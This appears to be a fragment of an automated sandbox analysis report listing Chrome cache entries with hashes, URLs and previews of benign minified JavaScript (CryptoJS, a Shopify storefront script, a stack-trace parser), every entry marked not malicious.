Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 160

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	XML 1.0 document, ASCII text
Category:	downloaded
Size (bytes):	243
Entropy (8bit):	5.623342915485822
Encrypted:	false
SSDEEP:
MD5:	6485965F7A7AC3428E04DEEDAA0805BA
SHA1:	4FCBFFB6E5F6FA53BDB370BA5311EFF7D3D0CD78
SHA-256:	4F112AE9A0D780480717A2416E54DC4052CAAE2736DDA25F31D41127678BA615
SHA-512:	8F1A2203CF096FE6314490F10B25AF99B2B7592CDD25F56F5C752691501E090665F8138FB73CCA05228EB0480202372A5258C9818A2E4D9FDA6492DFC1FB3C13
Malicious:	false
Reputation:	unknown
URL:	https://deverechemicals3.s3.amazonaws.com/wpm@5d08cde3w4f259957pd2db89ecm09d01778/web-pixel-shopify-app-pixel@0142/sandbox/worker.modern.js
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>Q9ZX9RBZV3C1PD9Q</RequestId><HostId>1WViz2dApY6uM7Xw4Ykz+mS4wQzKZrrSkOco3o8p9EKRhk5ZEo/zvxlrbDrR+kJhyi1Ok0Zm/F8=</HostId></Error>

Chrome Cache Entry: 165

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 89 x 64, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.068159130770307
Encrypted:	false
SSDEEP:
MD5:	646BD02036BA2E80335193CC17320D0A
SHA1:	7F7D65A27494D5D0130ECF61497EB69D99EADD81
SHA-256:	9177001FE488D7F90D655A4F37056EF886EFD5E4C5D2C65EA0046145D2AC007F
SHA-512:	3439D0B4A85F5FCCB655F157CB10A4D3EE66872D1B60BB20D51D159F0A5D13498D428BCC9121B1AF78BB3D86A6B9AFAE1E59C647E96E9DF751A1F9DD4885065F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...Y...@.......L.....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 166

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	116301
Entropy (8bit):	5.343245192541926
Encrypted:	false
SSDEEP:
MD5:	9BB489B4145F9AC74BB3A6058AFD39B2
SHA1:	1AEBEB6693B84CC6AFD857414D9B5D270CB58F19
SHA-256:	239C76342FDB34CAC59BA41D0C5212C6AF536071EE379A3B3470D506504756F4
SHA-512:	37C5927FE78ABDB24BDEC6C831F808F989FF30248DF688A0CE4589CE379B47213B54A8FED4101ED3A12FA5F321549E2B61B4C4E6160686CD75BE979C12D9BBD0
Malicious:	false
Reputation:	unknown
URL:	https://55db36-5b.myshopify.com/cdn/s/trekkie.storefront.f9102b76c4156d18a2f9ad80e236ecd6fdcc057c.min.js
Preview:	!function(){var e={354:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});const n="95ba910bcec4542ef2a0b64cd7ca666c";function o(e,t,n){try{var o;i({error:e,context:t,shopId:r()\|\|(null===(o=window.Shopify)\|\|void 0===o?void 0:o.shop),notes:n})}catch(e){}}function r(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function i(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key",n),t.setRequestHeader("Bugsnag-Payload-Version","5");const o=function(e){const t=(n=e.error).stackTrace\|\|n.stack\|\|n.description\|\|n.name;var n;const[o,r]=(t\|\|"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o\|\|"").trim(),message:(r\|\|"").trim(),stacktrace:[{file:"consent-tracking-ap

Chrome Cache Entry: 168

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
Category:	dropped
Size (bytes):	101456
Entropy (8bit):	5.4617530376370045
Encrypted:	false
SSDEEP:
MD5:	EEFCE565E64691DC99A8FE7646AAA9B2
SHA1:	5D65EB442CE28226426F2257996B1356FD4ECDBF
SHA-256:	92C91C32FE4313DAAD459D68FB25F3F47F6EA6B38E9D9887AF43D95E01AA9C34
SHA-512:	66DD62C94DF05F29948D1FFBCD54578B2AC8AE47B9293F39B4840879C6C5991177D693F122CB41D051BA632E14B84ECC4F18CBEB4E68F335AB716F8A0DF027B0
Malicious:	false
Reputation:	unknown
Preview:	(()=>{var e={482:function(e,t,n){var o,r,i;!function(s,a){"use strict";r=[n(550)],void 0===(i="function"==typeof(o=function(e){var t=/(^\|@)\S+:\d+/,n=/^\sat .(\S+:\d+\|\(native\))/m,o=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace\|\|void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(n))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]\|\|void 0,t[3]\|\|void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(n)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()])\|(,.$)/g,""));var n=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),o=n.match(/ (\(.+\)$)/);n=o?n.replace(o[0],""):n;var r=this.extractLoc

Static File Info

⊘No static file info